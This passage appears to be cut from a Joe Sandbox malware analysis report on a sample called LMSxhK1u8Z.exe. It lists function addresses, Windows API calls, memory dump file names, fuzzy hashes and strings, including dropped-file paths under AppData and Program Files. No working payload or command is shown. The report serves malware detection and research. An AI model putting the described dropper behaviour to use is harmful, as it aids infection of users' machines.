                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateInstance
                                                                                                • String ID: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Hendecasyllabic
                                                                                                • API String ID: 542301482-3586988424
                                                                                                • Opcode ID: 65ff1bb703aff5c65a52cd24046ec2ca8d8f77045bdbbb29ba0d81838cb63090
                                                                                                • Instruction ID: 088bd36a67d226d4641d4dbc6bd9d2ef39f197a4cbb9ab5218a9f08cb7fb8330
                                                                                                • Opcode Fuzzy Hash: 65ff1bb703aff5c65a52cd24046ec2ca8d8f77045bdbbb29ba0d81838cb63090
                                                                                                • Instruction Fuzzy Hash: 1C413075A00105AFCB00DFA4CD89EAE7BB6EF48314F20456AF906EB2D1DAB9DD41CB54
                                                                                                Function 00402706 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402715
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFindFirst
                                                                                                • String ID:
                                                                                                • API String ID: 1974802433-0
                                                                                                • Opcode ID: 569660b2523abb82da564ec188e45d2166ad8df796c24877e3114b12175852e5
                                                                                                • Instruction ID: 7be6c913c08d15ea884a43ce55a76abbcb29d6a56581a49c1298855279991998
                                                                                                • Opcode Fuzzy Hash: 569660b2523abb82da564ec188e45d2166ad8df796c24877e3114b12175852e5
                                                                                                • Instruction Fuzzy Hash: 19F05E75A001159BDB00EBA4DA499AEB378EF05324F60417BE516E31D1DBB44A41DB29
                                                                                                Function 004064EC Relevance: .3, Instructions: 334COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
                                                                                                • Instruction ID: 531fec7b0fb0d211cf15be9fd3757e070872b4d27e2d3c8a48bb83720311cc85
                                                                                                • Opcode Fuzzy Hash: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
                                                                                                • Instruction Fuzzy Hash: 01E19A71900705DFCB24CF98C890BAAB7F5FB44305F15882EE897A7291D778AAA1CF44
                                                                                                Function 00404132 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004041D0
                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004041E4
                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404201
                                                                                                • GetSysColor.USER32(?), ref: 00404212
                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404220
                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040422E
                                                                                                • lstrlenW.KERNEL32(?), ref: 00404233
                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404240
                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404255
                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 004042AE
                                                                                                • SendMessageW.USER32(00000000), ref: 004042B5
                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004042E0
                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404323
                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404331
                                                                                                • SetCursor.USER32(00000000), ref: 00404334
                                                                                                • ShellExecuteW.SHELL32(0000070B,open,@.C,00000000,00000000,00000001), ref: 00404349
                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00404355
                                                                                                • SetCursor.USER32(00000000), ref: 00404358
                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404387
                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404399
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                • String ID: @.C$N$open
                                                                                                • API String ID: 3615053054-801394694
                                                                                                • Opcode ID: 189af6bbec081a76bdebae2a70f4f566850949fa3ab236cd5487776f7d1f3ede
                                                                                                • Instruction ID: 99db4efdefbfae6e02fe30a975520441482abf578fd64f5d263331c8f1dab2c3
                                                                                                • Opcode Fuzzy Hash: 189af6bbec081a76bdebae2a70f4f566850949fa3ab236cd5487776f7d1f3ede
                                                                                                • Instruction Fuzzy Hash: 517181B1A00209FFDB119F60DD85AAA7B79FF84355F04803AFA05B61E0C778A951CF98
                                                                                                Function 00405A52 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 141filestringmemoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrcpyW.KERNEL32(00430898,NUL,?,00000000,?,?,?,00405C08,?,?,00000001,0040579D,?,00000000,000000F1,?), ref: 00405A62
                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405C08,?,?,00000001,0040579D,?,00000000,000000F1,?), ref: 00405A86
                                                                                                • GetShortPathNameW.KERNEL32(00000000,00430898,00000400), ref: 00405A8F
                                                                                                  • Part of subcall function 00405934: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405B51,00000000,[Rename]), ref: 00405944
                                                                                                  • Part of subcall function 00405934: lstrlenA.KERNEL32(?,?,00000000,00405B51,00000000,[Rename]), ref: 00405976
                                                                                                • GetShortPathNameW.KERNEL32(?,00431098,00000400), ref: 00405AAC
                                                                                                • wsprintfA.USER32 ref: 00405ACA
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00431098,C0000000,00000004,00431098,?,?,?,?,?), ref: 00405B05
                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405B14
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405B2E
                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00405B5E
                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00430498,00000000,-0000000A,0040A514,00000000,[Rename]), ref: 00405BB4
                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405BC6
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405BCD
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405BD4
                                                                                                  • Part of subcall function 004059CF: GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\LMSxhK1u8Z.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                                                                  • Part of subcall function 004059CF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                • String ID: %ls=%ls$NUL$[Rename]
                                                                                                • API String ID: 3756836283-899692902
                                                                                                • Opcode ID: f1fbf85e8721b65103666638b9a004b4b43e3e5a3ddcd2c3c3fa491cf2af1882
                                                                                                • Instruction ID: 2fe29930d4e79bd0ae977f5d9eb33e4478da98161fe3751d0f08acbad4e80cd6
                                                                                                • Opcode Fuzzy Hash: f1fbf85e8721b65103666638b9a004b4b43e3e5a3ddcd2c3c3fa491cf2af1882
                                                                                                • Instruction Fuzzy Hash: 0C410471200B05BFD2206B219D49F6B3AACEF85715F14043AF941F62D2EA7CF8018A7D
                                                                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                • DrawTextW.USER32(00000000,00433EA0,000000FF,00000010,00000820), ref: 00401156
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                • String ID: F
                                                                                                • API String ID: 941294808-1304234792
                                                                                                • Opcode ID: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
                                                                                                • Instruction ID: f1b70214e96eb8bec3146c709be0bbd1f29e4b49e587d4bf0c97a3ec82ce1e67
                                                                                                • Opcode Fuzzy Hash: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
                                                                                                • Instruction Fuzzy Hash: 00417C71400209AFCB058FA5DE459BF7BB9FF44315F00802EF591AA1A0C778EA54DFA4
                                                                                                Function 00405FDA Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\LMSxhK1u8Z.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 0040603D
                                                                                                • CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                                                                • CharNextW.USER32(?,"C:\Users\user\Desktop\LMSxhK1u8Z.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406051
                                                                                                • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406064
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$Next$Prev
                                                                                                • String ID: "C:\Users\user\Desktop\LMSxhK1u8Z.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 589700163-871486053
                                                                                                • Opcode ID: 73afb7676350ec278b66049aa62252973a0582d31a7c1b28115d42195e1f2e0a
                                                                                                • Instruction ID: fcf87bb4fcb389795acbe35438f6f12f46fcdf00a5008526b505f25df9ba4f2d
                                                                                                • Opcode Fuzzy Hash: 73afb7676350ec278b66049aa62252973a0582d31a7c1b28115d42195e1f2e0a
                                                                                                • Instruction Fuzzy Hash: B511B62684061299DB307B149C40B7763B8EF95760F51803FED8A732C0E77C5C9297AD
                                                                                                Function 004024EC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54filestringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,000000FF,Heteric,00000400,?,?,00000021), ref: 0040252D
                                                                                                • lstrlenA.KERNEL32(Heteric,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,000000FF,Heteric,00000400,?,?,00000021), ref: 00402534
                                                                                                • WriteFile.KERNEL32(00000000,?,Heteric,00000000,?,?,00000000,00000011), ref: 00402566
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                • String ID: 8$C:\Program Files (x86)\edelweissen\romanblade.ini$Heteric
                                                                                                • API String ID: 1453599865-1441359250
                                                                                                • Opcode ID: 877e15414ace404058adc7f8c27eed512349f5fb36d6d15f4eee69221c79fb7a
                                                                                                • Instruction ID: 735716144e4411cb43a0d30ab2875379506436d26c05ff50a3a47e8288d67bee
                                                                                                • Opcode Fuzzy Hash: 877e15414ace404058adc7f8c27eed512349f5fb36d6d15f4eee69221c79fb7a
                                                                                                • Instruction Fuzzy Hash: 62019271A44604FED700ABB19E4DEAF7668EF5031AF20053BB102B60D1D6FC4D919A6D
                                                                                                Function 00403FFC Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00404019
                                                                                                • GetSysColor.USER32(00000000), ref: 00404035
                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00404041
                                                                                                • SetBkMode.GDI32(?,?), ref: 0040404D
                                                                                                • GetSysColor.USER32(?), ref: 00404060
                                                                                                • SetBkColor.GDI32(?,?), ref: 00404070
                                                                                                • DeleteObject.GDI32(?), ref: 0040408A
                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404094
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                • String ID:
